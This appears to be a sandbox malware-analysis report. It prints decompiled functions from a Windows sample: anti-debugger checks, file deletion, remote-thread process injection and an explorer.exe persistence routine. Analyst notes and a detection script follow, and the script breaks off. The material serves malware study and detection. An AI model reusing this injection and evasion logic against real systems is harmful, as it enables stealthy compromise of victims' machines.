                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\NTICE
                                    • API String ID: 3498533004-2502798147
                                    • Opcode ID: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction ID: dcdfadaa743e4582149ecbcd816e92e043e7093f062ec94bd67b511fcc83bcd2
                                    • Opcode Fuzzy Hash: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction Fuzzy Hash: 27D0CAB238170039F83438A92C97F1A440C9701B29EA0833ABB20BA1E1C4A8AA29021C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405814() {
                                    				void* _t1;
                                    				void* _t4;
                                    
                                    				_t4 = 0;
                                    				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                    				if(_t1 != 0xffffffff) {
                                    					CloseHandle(_t1);
                                    					_t4 = 1;
                                    				}
                                    				return _t4;
                                    			}






                                    APIs
                                    • CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040582E
                                    • CloseHandle.KERNEL32(00000000,\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405839
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\SICE
                                    • API String ID: 3498533004-948585333
                                    • Opcode ID: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction ID: 3ad54f1ae86a7dc7f46777f6809a8286594d703ee9eb335483981d0cf1385b1e
                                    • Opcode Fuzzy Hash: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction Fuzzy Hash: B8D012723C170039F83038A51C97F07400C5701B2DEB08336BB10BD1E1C4F8B619051C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E00405A28(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v9;
                                    				void* _t13;
                                    				int _t24;
                                    				intOrPtr _t36;
                                    				intOrPtr _t37;
                                    				CHAR* _t40;
                                    				void* _t42;
                                    				void* _t43;
                                    				intOrPtr _t44;
                                    				void* _t45;
                                    
                                    				_t45 = __eflags;
                                    				_t42 = _t43;
                                    				_t44 = _t43 + 0xfffffff8;
                                    				_push(__ebx);
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t42);
                                    				_push(0x405ac7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t44;
                                    				_v9 = 0;
                                    				_t13 = E00405D04(_v8, __ebx, _t45); // executed
                                    				if(_t13 != 0) {
                                    					_push(_t42);
                                    					_push(0x405aa7);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t44;
                                    					_t40 = E00401F48(_v8);
                                    					GetFileAttributesA(_t40); // executed
                                    					SetFileAttributesA(_t40, 0); // executed
                                    					_t24 = DeleteFileA(_t40); // executed
                                    					asm("sbb eax, eax");
                                    					_v9 = _t24 + 1;
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    				}
                                    				_pop(_t36);
                                    				 *[fs:eax] = _t36;
                                    				_push(E00405ACE);
                                    				return E00401AC0( &_v8);
                                    			}















                                    APIs
                                      • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                      • Part of subcall function 00405D04: FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A73
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A89
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A8F
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction ID: 1c4186debc08bb4691b9d877f2086b3288a94b326db33eea14d01e2d90e30b07
                                    • Opcode Fuzzy Hash: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction Fuzzy Hash: 52110230324644AED702DB658C12A9F7BECDB0A704F6204BAF400E22D2D67D5E00DA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004038AC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
                                    				void* _v8;
                                    				long _v12;
                                    				long _v16;
                                    				void* _t16;
                                    				void* _t23;
                                    				void* _t31;
                                    				void* _t32;
                                    				void* _t33;
                                    
                                    				_v8 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t33 = E0040387C(__eax, _a8, _v8);
                                    				_t16 = CreateRemoteThread(_t23, 0, 0, E0040387C(_t23, E004037DC(__edx), _t31), _t33, 0,  &_v16); // executed
                                    				_t32 = _t16;
                                    				if(_a4 != 0) {
                                    					WaitForSingleObject(_t32, 0xffffffff);
                                    					ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
                                    				}
                                    				return _t32;
                                    			}












                                    APIs
                                      • Part of subcall function 0040387C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                      • Part of subcall function 0040387C: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID:
                                    • API String ID: 3966641755-0
                                    • Opcode ID: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction ID: 98dfc2b63562e43be382328cbb186e20acb4a9321053857b4be2ba9adcb19dad
                                    • Opcode Fuzzy Hash: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction Fuzzy Hash: D9018F717001087BD710EA6E8C81FAFBBED8B89325F20857AB518E73C1D974DE0083A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E0040555C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				void* _t28;
                                    				intOrPtr _t41;
                                    				intOrPtr _t45;
                                    				intOrPtr _t50;
                                    				intOrPtr _t51;
                                    				void* _t52;
                                    
                                    				_t52 = __eflags;
                                    				_t48 = __esi;
                                    				_t47 = __edi;
                                    				_t50 = _t51;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_push(_t50);
                                    				_push(0x405607);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				_push(_t50);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				_v8 = 0x100;
                                    				E00402074( &_v12, _v8);
                                    				GetUserNameA(E00401F48(_v12),  &_v8); // executed
                                    				_pop(_t41);
                                    				 *[fs:eax] = _t41;
                                    				E00404740(_v12, __ebx,  &_v16, __edi, __esi, _t52);
                                    				_push(_v16);
                                    				E00404740("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
                                    				_pop(_t28);
                                    				E00401E94(_t28, _v20);
                                    				_t45 = 0x4055b2;
                                    				 *[fs:eax] = _t45;
                                    				_push(E0040560E);
                                    				return E00401AE4( &_v20, 3);
                                    			}














                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,00000100), ref: 004055A3
                                      • Part of subcall function 00404740: CharUpperA.USER32(?,00000000,004047B5), ref: 0040477E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CharNameUpperUser
                                    • String ID: CurrentUser
                                    • API String ID: 2323927870-4020899948
                                    • Opcode ID: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction ID: 79fc34cd5b686bd2ad1a611b0b6b124d48364b0ba66751db6594d0a242cb1dd3
                                    • Opcode Fuzzy Hash: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction Fuzzy Hash: 65117375514604BEDB05DB91DC56CAF77BCE749700B91487AF400E3680D7786E048964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004013A4(intOrPtr __eax, intOrPtr* __edx) {
                                    				char _v276;
                                    				CHAR* _t7;
                                    				long _t9;
                                    				intOrPtr* _t12;
                                    				CHAR* _t17;
                                    				intOrPtr _t18;
                                    				void* _t19;
                                    
                                    				_t12 = __edx;
                                    				_t18 = __eax;
                                    				E00401AC0(__edx);
                                    				_t20 = _t18;
                                    				if(_t18 == 0) {
                                    					_t9 = GetModuleFileNameA(0,  &_v276, 0x105); // executed
                                    					return E00401BAC(_t12, _t9, _t19, _t20);
                                    				}
                                    				_t17 = GetCommandLineA();
                                    				while(1) {
                                    					_t7 = E004012B8(_t17, _t12);
                                    					_t17 = _t7;
                                    					__eflags = _t18;
                                    					if(_t18 == 0) {
                                    						break;
                                    					}
                                    					__eflags =  *_t12;
                                    					if( *_t12 != 0) {
                                    						_t18 = _t18 - 1;
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				return _t7;
                                    			}











                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • GetCommandLineA.KERNEL32(?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013DA
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CommandFileLineModuleName
                                    • String ID:
                                    • API String ID: 2151003578-0
                                    • Opcode ID: af4a5eb0bc67ba89c9692b8dc5ebedf84787e4a76e86bf27e6dddde34da4ddc0
                                    • Instruction ID: bfab612d428c5fdc4c3d8e73d94946365303e54022b79f8a2b9667094a9042cc
                                    • Opcode Fuzzy Hash: af4a5eb0bc67ba89c9692b8dc5ebedf84787e4a76e86bf27e6dddde34da4ddc0
                                    • Instruction Fuzzy Hash: 11F0A022B01B1097E721A16E0C8276E21C58BC8764F59017FBE49FBBE1EA7CCC45529A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00406660(void* __eax) {
                                    				signed char _t5;
                                    
                                    				_t5 = GetFileAttributesA(E00401F48(__eax)); // executed
                                    				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}




Address range: 0x0040666b - 0x00406680

                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004066BB,00000000,00406794,?,?,00000000,00000000,00000000,00000000), ref: 0040666B
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction ID: fca0ec8dcb75db4ffbb1fbdbb764ae01d2ede40a2229cdd6f6647931c02f8f91
                                    • Opcode Fuzzy Hash: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction Fuzzy Hash: B8C08CE02012000ADE10A9FE0CC1A1A02C80E1437AB602F7BF039F33E2E27F88322028
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00403566(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                    				void* _t8;
                                    
                                    				_t4 = _a12;
                                    				asm("sbb eax, eax");
                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                    				return _t8;
                                    			}




Address range: 0x0040356b - 0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction ID: 72f15282d468185fbe7a0b5f937441395a77a4796b686d6b9836a445fb31a29c
                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction Fuzzy Hash: 6ED0127325024CBFC700EEBDCC05DAB33DC9718609B008425B918C7100D139EA508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00403568(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                    				void* _t8;
                                    
                                    				_t4 = _a12;
                                    				asm("sbb eax, eax");
                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                    				return _t8;
                                    			}




Address range: 0x0040356b - 0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: b1e9c139d53b74868f197cdea1108a814add3867d20bcc7908f8201953e61f5a
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: 0FC0127315024CABC700EEBDCC05D9B33DC5718609B008425B518C7100D139E6508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlReAllocateHeap.NTDLL(00490000,00000000), ref: 0040116D
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction ID: de04998b76c7b9bc537c8d7dd9716f6d6fbeb3d3f43a7f0598963b3529812e59
                                    • Opcode Fuzzy Hash: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction Fuzzy Hash: 08B092B2500100AAD740D799DD42F4222ACA30C348F840C647248F31A1D13CA420472C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00401122(long __eax) {
                                    				long _t2;
                                    				void* _t4;
                                    
                                    				_t2 =  *0x40d03c; // 0x0
                                    				_t4 = RtlAllocateHeap( *0x40e590, _t2, __eax); // executed
                                    				return _t4;
                                    			}





Address range: 0x00401125 - 0x00401136

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00490000,00000000), ref: 00401131
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction ID: c8d19fe016ae2e0651702f7a29d851e7a2fc058706c9609f530dee1e772ded5c
                                    • Opcode Fuzzy Hash: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction Fuzzy Hash: 65B092A5A00000AFE640E7ED9E40E2223ECA70C2083800C247208E3162E13898104728
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 27%
                                    			E00401139(void* __eax) {
                                    				signed int _t2;
                                    				signed int _t5;
                                    
                                    				_t2 =  *0x40d03c; // 0x0
                                    				_t5 = HeapFree( *0x40e590, _t2 & 0x00000001, ??); // executed
                                    				asm("sbb eax, eax");
                                    				return  ~_t5 & 0x0000007f;
                                    			}





Address range: 0x0040113c - 0x0040115b

                                    APIs
                                    • HeapFree.KERNEL32(00490000,00000000), ref: 0040114B
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction ID: 0196c5bfe9261146ad4c3cc9aab034bd4c3b0778a6c2e215fe72248fa00cbfe1
                                    • Opcode Fuzzy Hash: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction Fuzzy Hash: 47C08CB3220101ABDB0087E9DDC2D6622ECB208208B140C21F908EB061E13EC8A40228
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 65%
                                    			E0040B7FC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				struct _PROCESS_INFORMATION _v24;
                                    				struct _STARTUPINFOA _v92;
                                    				char _v96;
                                    				intOrPtr _t21;
                                    				void* _t44;
                                    				intOrPtr* _t50;
                                    				intOrPtr _t53;
                                    				void* _t62;
                                    
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v96 = 0;
                                    				_push(_t62);
                                    				_push(0x40b8fa);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62 + 0xffffffa4;
                                    				_t50 =  *0x40d204; // 0x40e8f8
                                    				E00401D9C( &_v96, "_PERSIST",  *_t50);
                                    				_t44 = E00403568(0, 0, E00401F48(_v96));
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t44);
                                    					_t21 =  *0x40d1cc; // 0x40e924
                                    					_t59 = E00401F9C(_t21);
                                    					GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    					if(E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t27, "_PERSIST", _t22, __edi, _t22) == 0) {
                                    						E00403738();
                                    						E00403738();
                                    						CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v92,  &_v24);
                                    						E004040F4(_v24.hProcess, _v24.hProcess, "_PERSIST", _t59, __edi, _t59);
                                    					}
                                    				} else {
                                    					CloseHandle(_t44);
                                    				}
                                    				_pop(_t53);
                                    				 *[fs:eax] = _t53;
                                    				_push(E0040B901);
                                    				return E00401AC0( &_v96);
                                    			}












Address range: 0x0040b802 - 0x0040b8f9

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040B8FA), ref: 0040B840
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B84D
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B858
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040B874
                                    • GetWindowThreadProcessId.USER32(00000000,Shell_TrayWnd), ref: 0040B87A
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000,?,00000000,00000000,0040B8FA), ref: 0040B88A
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000), ref: 0040B8D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCreateHandleWindow$ErrorFindLastMutexOpenThread
                                    • String ID: $@$Shell_TrayWnd$_PERSIST$explorer.exe
                                    • API String ID: 3936873891-3256395681
                                    • Opcode ID: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction ID: a98b29369305a718b3746a0c20b80fe6e43b54703aa679a88659f244b6e949d5
                                    • Opcode Fuzzy Hash: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction Fuzzy Hash: 862131B5B402097BE710FBA5CC42F9E77ACDB44705F60843BB600BB2D2DA78AE05566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%
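
E0040B7FC above is the routine behind the "Injects code into the Windows Explorer (explorer.exe)" signature. Read in order: E00401D9C builds a mutex name from the config string referenced at 0x40d204 plus "_PERSIST"; E00403568 (the CreateMutexA wrapper shown earlier) creates it. If GetLastError() is anything other than 0xB7 (ERROR_ALREADY_EXISTS) this is the first running instance, so the routine locates the shell with FindWindowA("Shell_TrayWnd", 0), resolves the owning PID with GetWindowThreadProcessId, opens it with access mask 0x1F0FFF (PROCESS_ALL_ACCESS as defined in SDKs before Vista) and hands the handle to E004040F4. If that returns 0 it falls back to CreateProcessA(0, "explorer.exe", ..., dwCreationFlags = 4, which is CREATE_SUSPENDED, ...) and injects into the fresh process through the hProcess field of the PROCESS_INFORMATION struct. If the mutex already exists it only closes the handle and returns. The telemetry this leaves is a process-access event against explorer.exe with a write- and thread-capable mask and, on the fallback path, explorer.exe started by a parent other than the logon chain. The Python below is an added triage example, not the sample's code and not part of the Joe Sandbox report: it decodes any process access mask into named rights (so it goes beyond the single 0x1F0FFF value in the function) and runs both checks over constructed Sysmon-style records. Field names follow Sysmon Event ID 10 (ProcessAccess) and Event ID 1 (ProcessCreate); the source path C:\Windows\dropped.exe and both allowlists are assumptions to tune per environment.

```python
"""Triage helpers for the explorer.exe injection pattern in E0040B7FC.

Added example. SAMPLE_EVENTS are constructed Sysmon-style records, not telemetry
from the analysed run; the allowlists are starting points to tune per environment.
"""
from typing import Dict, List

# Process access rights from winnt.h. 0x1F0FFF is PROCESS_ALL_ACCESS as defined in
# SDKs before Vista (bits 0-11 | STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE); Vista+
# SDKs define it as 0x1FFFFF, adding the two *_LIMITED_INFORMATION bits.
PROCESS_RIGHTS: Dict[int, str] = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
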